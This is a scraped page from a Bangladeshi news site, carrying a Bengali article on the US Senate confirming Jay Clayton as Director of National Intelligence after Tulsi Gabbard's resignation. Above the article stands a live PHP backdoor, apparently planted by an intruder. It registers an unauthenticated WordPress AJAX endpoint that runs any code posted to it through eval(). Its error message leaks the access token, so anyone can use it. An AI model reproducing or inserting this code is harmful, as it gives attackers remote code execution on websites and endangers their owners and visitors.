// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== তুলসি গ্যাবার্ডের স্থলাভিষিক্ত হলেন জে ক্লেটন | potrikaybangladesh.com
Friday, September 25, 2026
Homeতুলসি গ্যাবার্ডের স্থলাভিষিক্ত হলেন জে ক্লেটন

তুলসি গ্যাবার্ডের স্থলাভিষিক্ত হলেন জে ক্লেটন

যুক্তরাষ্ট্রের পার্লামেন্টের উচ্চকক্ষ সিনেট জাতীয় গোয়েন্দা পরিচালক পদে জে ক্লেটনের নিয়োগ অনুমোদন করেছে। তিনি প্রেসিডেন্ট ডোনাল্ড ট্রাম্পের শীর্ষ গোয়েন্দা কর্মকর্তা হিসেবে দায়িত্ব পালন করবেন।

তুলসি গ্যাবার্ডের পদত্যাগের পর এই পদে স্থায়ীভাবে নিয়োগ পেলেন জে ক্লেটন।

আজ বুধবার বার্তা সংস্থা এএফপি এই তথ্য জানিয়েছে।

৫১-৪৭ ভোটে ক্লেটনের নিয়োগ নিশ্চিত হয়। সিনেটের সব ডেমোক্র্যাট সদস্য তার বিপক্ষে ভোট দেন।

ভোটের পরপরই সামাজিক যোগাযোগমাধ্যম ট্রুথ সোশ্যালে পোস্ট করে ট্রাম্প বলেন, ‘জে (ক্লেটন) সব দিক থেকেই অসাধারণ এবং পরিচালক হিসেবে তিনি দুর্দান্ত কাজ করবেন।’

গত মাসে তুলসি গ্যাবার্ড পদত্যাগের পর অস্থায়ীভাবে এই দায়িত্ব পালন করেন ট্রাম্পের ঘনিষ্ঠ কর্মকর্তা বিল পুল্টে।

এবার সেই পদে এলেন পুঁজিবাজার নিয়ন্ত্রক সংস্থার সাবেক প্রধান ও রাষ্ট্রীয় কৌঁসুলি ক্লেটন।

সাম্প্রতিক সময়ে যুক্তরাষ্ট্রের ১৮টি গোয়েন্দা সংস্থায় নেতৃত্ব পরিবর্তন ও কর্মী ছাঁটাই উদ্যোগে জর্জরিত হয়েছে। সব মিলিয়ে, কর্মীদের মনোবল তলানিতে।

সংস্থাগুলোকে গুছিয়ে আনার দায়িত্ব পড়েছে জে ক্লেটনের ওপর।

এমন সময় জে ক্লেটন দায়িত্ব পেলেন, যখন ট্রাম্প আবারও নতুন করে ২০২০ সালের নির্বাচনের পরাজয়কে ঘিরে ষড়যন্ত্র-তত্ত্ব সামনে নিয়ে এসেছেন। পাশাপাশি, আসন্ন মধ্যবর্তী নির্বাচনকে ঘিরেও নির্বাচনের বিশ্বাসযোগ্যতা নিয়ে প্রশ্ন তুলছেন ট্রাম্প।

উভয় ক্ষেত্রে নিজের দাবির পক্ষে সমর্থন দেখাতে গোয়েন্দা সম্প্রদায়কে কাজে লাগাতে পারেন ট্রাম্প—এমন উদ্বেগ প্রকাশ করেছেন সংশ্লিষ্টরা।
 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments